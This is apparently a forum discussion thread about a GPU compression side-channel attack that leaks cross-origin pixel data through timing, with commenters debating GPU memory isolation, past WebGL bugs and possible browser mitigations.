I had seen this happening. I was running webgl shaders in chrome in a pipeline where i was passing the result of the previous screen to be processed by the next, then sometimes I would get portions of other app windows inside the result with the post-processing webgl shader filter applied to it, which was crazy. I thought it was just a glitch on my system and couldn't replicate it reliably, it would just happen sometimes. Good to know it wasn't just my system :)
That’s something different: that’s just a straight-up bug in the driver or compositor, directly allowing access to the graphics memory of other programs. It’s stupid that such bugs occur, but occur they do. GPU drivers especially have historically been mindbogglingly badly implemented, though most of the worst problems are fully ironed out now. But what’s being reported here is far more subtle, a side-channel attack based on data compression.
I don't think this was the same vulnerability that you saw happening. I think many operations in shaders produce "unspecified" pixel values, which in practice often just manifests in getting pixel values from some previously freed buffer that is not yet overwritten.
I believe webgl should remove these kind of side channels, but implementations could have bugs.
Also GPU vendors should consider multi-user usage anyway and make these side channels impossible outside of webgl too. I doubt that they care and they would rather chase performance numbers.
When was this? When WebGL was a new thing, there was no protection whatsoever and an uninitialized textures and buffers could contain stale data from other processes. But this has been fixed like a decade ago.
In any case, what you saw is not what is described by this article. This article extracts pixel data very slowly by measuring GPU timings.
> I thought it was just a glitch on my system and couldn't replicate it reliably, it would just happen sometimes. Good to know it wasn't just my system :)
Similar to this attack then, seems it can take up to 30 minutes on a AMD system, and up to 215 minutes on a Intel system, and it's still not 100% accurate.
This is beautiful, and horrifying, all at the same time.
I'm reminded of the paper that reverse engineered ECC codings to demonstrate how you could rowhammer through it - just a lot of tedious RE work as a prerequisite to making the point they wanted to make.
This is what, the third class of side channel attacks that need to mitigated?
I think at some point we may have to stop and rethink the entire modern computing architecture; either that or stop running untrusted code by default. It seems these issues will inevitably come up again and again.
You need to trust at least the hardware manufacturer. If that is yourself, then you probably don't have equipment needed to make it so fast as to be able to use modern software or services practically.
I feel like something is rather wrong with the security model that allows origin A to render a filtered version of a non-CORS-authorized image from origin B. Why is this useful? (Other than enabling awesome attacks like this.)
With our central processor units we developed a process model where each process was isolated memory wise from each other. And then went on to destroy that model with threads... but I digress. This process isolation culture was probably born from shared systems where each user needs to be isolated from each other. but has served us well with in providing robust single user systems. and has proved critical with the move back to shared cloud computing.
Graphical processing units hove no concept of memory isolation. and have no culture of wanting it. They were high performance units for a single user only. At this point trying to introduce isolation levels would probably be a lost cause. Many people would be very unhappy at the performance hit that would be required.
But yeah a GPU in a shared environment spooks me as well.
All modern GPUs have isolated memory contexts and full CPU-like virtual memory address space and page tables for each user context. It's not possible to (directly) read data from another context. As far as I can tell from what you're trying to say, your comment is completely incorrect about GPUs not supporting that.
From the description given, I assume this is using timing differences to tell the size of each compressed tile, which gives you info on it's contents. This is certainly not helped by the ability for an apparently untrusted iframe to apply a transform to a target that the security model would normally disallow reading pixels from, amplifying the data from this side channel. Without that it's "just" another sidechannel attack.
Ah, consider myself corrected then. I have not done much gpu programing(i guess it shows). I was under the impression there was no virtual memory and any illusion of an isolated process was solely due to driver trickery.
Yeah, I had to check if it's one of those bots. It's fascinating to me that a person has the urge to spit out two paragraphs devoid of any correct information or value for that matter, as an answer to a question online -- as if it can't be looked up or researched easily!
No problem - though virtual memory was required by the DX10 spec, so it's not like it's a new thing. And even before that, many GPUs had (more limited) memory management units/memory protection.
All of them, GPU memory is fully virtualized in order if nothing else to easily support multiple applications running natively on it since GPUs aren’t used for display & rendering only anymore where multiple clients could be simply handled solely by the composer.
Most of the driver has also been moved into user space at least on Windows and MacOS I’m not fully versed in the state of the user vs kernel space display drivers on Linux these days.
For clarity applications that don’t know how to use virtual memory will still operate under segmented mode where they’ll access the physical memory directly however under Windows at least these days and for a while now even the segmented mode is emulated you’ll need to run your engine on bare metal completely to access physical memory directly via segment addressing.
Money quote from the abstract: "Compression induces data-dependent DRAM traffic and cache utilization, which can be measured through side-channel analysis."
This attack vector doesn't seem to be very GPU-specific. Maybe the memory access pattern and the compression used by the GPU drivers combined with the sensitivity of the information being transferred make the GPU drivers an attractive target for this attack vector.
But in principle this attack vector could be present for other processes without the GPU being involved at all, couldn't it? CPU cache is a big side-channel across processes ran on the CPU.
Unless the traffic has some correlation to the contents - e.g. the data is compressed so "simpler" data has less traffic - it doesn't seem directly relevant. As far as I'm aware, there's no data dependance on CPU cache or dram busses with one exception - zeroing cache lines are often special-cased. This might be useful for some very specific attacks?
Also this might be usable as an attack on an OS that use some sort of compressed ram or swap - evicting a page from a target process's working set could cause something that could be measured, and thus information about how well the compression algorithm it uses happened to cope, telling you something about the contents.
But one of the big parts of this is the iframe transforms allowing you to amplify the "interesting" data from the noise across security boundaries (IE turning a single pixel into a large number of compressed tiles, making the attack much simpler). That feels like more of a software issue than a hardware one. I'm not sure if something similar can be done on the CPU side of things, and if that's strictly required to make this attack possible, or just easier.
Note that this can be fully mitigated in software: the browser only needs to hide the latency difference, say, by first measuring the upper bound with random pattern and then setting the measured time to that.